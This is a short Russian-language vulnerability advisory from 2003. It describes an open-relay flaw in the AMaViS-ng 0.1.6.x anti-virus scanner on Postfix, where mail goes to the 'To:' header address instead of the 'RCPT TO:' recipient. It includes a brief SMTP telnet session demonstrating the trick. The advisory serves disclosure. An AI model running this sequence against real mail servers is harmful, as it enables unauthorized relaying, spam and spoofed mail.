Дата публикации: | 14.04.2003 |
Всего просмотров: | 1161 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в AMaViS anti-virus сканере. Удаленный пользователь может эксплуатировать почтовый сервер, использующий AMaViS, чтобы посылать неавторизованные почтовые сообщения.
Как сообщается, удаленный пользователь может посылать неавторизованные почтовые сообщения через postfix почтовый сервер с запущенным AMaViS-ng. Система для отправки сообщений использует "To:" заголовок, вместо "RCPT TO:" команды. Пример: #> telnet somemx.domain.tld 25 (220 somemx.domain.tld ESMTP Postfix) helo amavis-ng (250 somemx.domain.tld) mail from:userX@domainX.tld (250 ok) rcpt to:userY@domain.tld (250 ok) data (354 End data with <CR><LF>.<CR><LF>) From: userX@domainX.tld To: userZ@domainZ.tld Subject: AMaViS-ng 0.1.6.x bug . (250 Ok: queued as ...) quit (221 Bye)Уязвимость обнаружена в AMaViS Anti-Virus Scanner 0.1.6.x |
Ссылки: | AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss |